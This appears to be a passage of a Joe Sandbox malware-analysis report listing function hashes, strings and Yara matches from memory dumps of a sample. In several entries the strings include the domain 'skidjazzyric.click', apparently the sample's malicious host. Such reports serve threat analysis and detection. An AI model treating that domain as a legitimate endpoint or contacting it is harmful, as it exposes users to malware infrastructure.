                                                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                        • Instruction ID: 9c76e1e074c2b9c98f32bb51b30136c15abc879bcb6d52d8ad302d1d87a6212a
                                                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                        • Instruction Fuzzy Hash: E081FC6124C3818BD719CF3984A137AFFD29FD6218F2C496DE4D58B281D339C50ACB56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8<j?$D$4b
                                                                                                        • API String ID: 0-2390459867
                                                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                        • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                        • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: D`a&$NMNO$bX_^
                                                                                                        • API String ID: 2994545307-620122162
                                                                                                        • Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                        • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                                                        • Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                        • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: NP,?$UA
                                                                                                        • API String ID: 0-2573221895
                                                                                                        • Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                        • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                        • Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                        • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {wBy$?;;
                                                                                                        • API String ID: 0-3800777323
                                                                                                        • Opcode ID: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
                                                                                                        • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                        • Opcode Fuzzy Hash: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
                                                                                                        • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: UXY^$skidjazzyric.click
                                                                                                        • API String ID: 0-1204630608
                                                                                                        • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                        • Instruction ID: 9932cb72546b309117d4d278dbf69a7600c1471b0813e6feb0035f1b67aae984
                                                                                                        • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                        • Instruction Fuzzy Hash: ED9123B5604B818FD3558F29C990661FBE2FF96300B19869CC1D24FB66C738E806CF95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: UXY^$skidjazzyric.click
                                                                                                        • API String ID: 0-1204630608
                                                                                                        • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                        • Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
                                                                                                        • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                        • Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: o~$yr
                                                                                                        • API String ID: 0-1013308823
                                                                                                        • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                        • Instruction ID: 9a0181e80be7dc7a07930ee2c42ce3940821fe4f9fd001a3ce99e95a93ee4b03
                                                                                                        • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                        • Instruction Fuzzy Hash: 8C91357694C3508BD320DF18C844AABFBE2EFC5324F09892CE9D95B390E7B48506C786
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: o~$yr
                                                                                                        • API String ID: 0-1013308823
                                                                                                        • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                        • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                                                        • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                        • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D`a&$NMNO
                                                                                                        • API String ID: 0-4143563191
                                                                                                        • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                        • Instruction ID: b1bf8f860d49627a71d185c678ce5ae427cfba7f727a6fbd26e8ab1de54edbb4
                                                                                                        • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                        • Instruction Fuzzy Hash: E78156316483454FD31ADF28CC81A6BB7A3EFC5328F29C66CE5A54B391DB31D8098795
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :7$%$:7$%
                                                                                                        • API String ID: 0-2391988857
                                                                                                        • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                        • Instruction ID: 346c4d85b08b0351dc220a2a4bba06f1c484953f6fa63c8ed0b33ae57d19ebbe
                                                                                                        • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                        • Instruction Fuzzy Hash: A521B0711183908BD7489F79C964B6FFBE5FB86318F145A2CE1D287291DBB4C409CB82
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :7$%$:7$%
                                                                                                        • API String ID: 0-2391988857
                                                                                                        • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                        • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                                                        • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                        • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MO$MO
                                                                                                        • API String ID: 0-3148518880
                                                                                                        • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                        • Instruction ID: 2ce844b8724d9bfc893778de91afc09e15faee3b30b765fa1756c5b1b9d9697e
                                                                                                        • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                        • Instruction Fuzzy Hash: 2611AC742443818BEF558FA9DD91667BFA0EF42220F1499D8DD895F38BC638C501CFA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7&'$$vA\
                                                                                                        • API String ID: 0-2621209329
                                                                                                        • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                        • Instruction ID: f2397d654bfc2104c6699151cf85315d8f9d2ef21f525a17c9b2e28d4c25f3fb
                                                                                                        • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                        • Instruction Fuzzy Hash: 2BF0C8705545944BEB918F3C98996BE67F0E743214F202AB4C65AE32A2C730C4818F08
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7&'$$vA\
                                                                                                        • API String ID: 0-2621209329
                                                                                                        • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                        • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                                                        • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                        • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                                                        • Instruction ID: c31a76099084191e3034c22a37ea28885ef806c0d431935db3893f7feff996f6
                                                                                                        • Opcode Fuzzy Hash: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                                                        • Instruction Fuzzy Hash: 92F1DE356087418FC724CF29C88066BFBE6EFD9300F08882EE5D597791E679E845CB96
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02107E61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID:
                                                                                                        • API String ID: 237503144-0
                                                                                                        • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                        • Instruction ID: 3ae5aa26a5a9ac8ce854e1a6b6ceebbe57948df16f4f424c9da70606b1910447
                                                                                                        • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                        • Instruction Fuzzy Hash: A2B10372A487218BC314CF28C4D17AAF7E2FFD9314F19962CE4C55B294E774A902C795
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :;
                                                                                                        • API String ID: 0-3581617570
                                                                                                        • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                        • Instruction ID: 041f35a412731dd7b84b3833256e79d39d801c408ed01860730a4f62db4fec2a
                                                                                                        • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                        • Instruction Fuzzy Hash: 32A11871A843209BD714AF28CC817ABB3E1EF81324F09853CED959B291E379ED05C792
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :;
                                                                                                        • API String ID: 0-3581617570
                                                                                                        • Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                                                        • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                                                        • Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                                                        • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: NP,?
                                                                                                        • API String ID: 0-3110377521
                                                                                                        • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                        • Instruction ID: 023129a529ac905d05b877d55c25f26a9b1cb273dadb5b167414b9369ca9c3db
                                                                                                        • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                        • Instruction Fuzzy Hash: 95A128716843309FD724CF28C881B2FB7A6DBC5728F1A862DF69467290D731A819CBD5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: NP,?
                                                                                                        • API String ID: 0-3110377521
                                                                                                        • Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                                                        • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                                                        • Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                                                        • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ''
                                                                                                        • API String ID: 0-694448769
                                                                                                        • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                        • Instruction ID: a418e165fcc5c550d5eb66a6901921d5d75d282c98d8fd897e4afda9272500b3
                                                                                                        • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                        • Instruction Fuzzy Hash: 589122B56583008BC3148F28C89166BB7E2EFC5364F18DA2DE8D58B7D0E7B4D505CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ''
                                                                                                        • API String ID: 0-694448769
                                                                                                        • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                        • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                                                        • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                        • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *+
                                                                                                        • API String ID: 0-2181965719
                                                                                                        • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                        • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                                                        • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                        • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: _\]R
                                                                                                        • API String ID: 0-1576797437
                                                                                                        • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                        • Instruction ID: 56bed7024f28e2bd171af7c4840a4b628ffd1f274bc213c0dab560af8a72e6cb
                                                                                                        • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                        • Instruction Fuzzy Hash: FF9125316483619BCB19EF28C850A6FB7E3EFD9324F19856CE8C587291E731AC05C786
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: _\]R
                                                                                                        • API String ID: 2994545307-1576797437
                                                                                                        • Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                                                        • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                                                        • Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                                                        • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: =^"\
                                                                                                        • API String ID: 0-2152245029
                                                                                                        • Opcode ID: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                                                        • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                                                        • Opcode Fuzzy Hash: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                                                        • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "
                                                                                                        • API String ID: 0-123907689
                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                        • Instruction ID: 4a33ae5517949d4ddd2fa4d14913ddad36f257f24495a3e03a7221dce5362bcc
                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                        • Instruction Fuzzy Hash: 56710432A483559BDB24CE28E88031EBBE2ABC6714F1AC93DE4959B3D1D375DC44C786
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "
                                                                                                        • API String ID: 0-123907689
                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                        • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                        • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: _;=8
                                                                                                        • API String ID: 0-3640539833
                                                                                                        • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
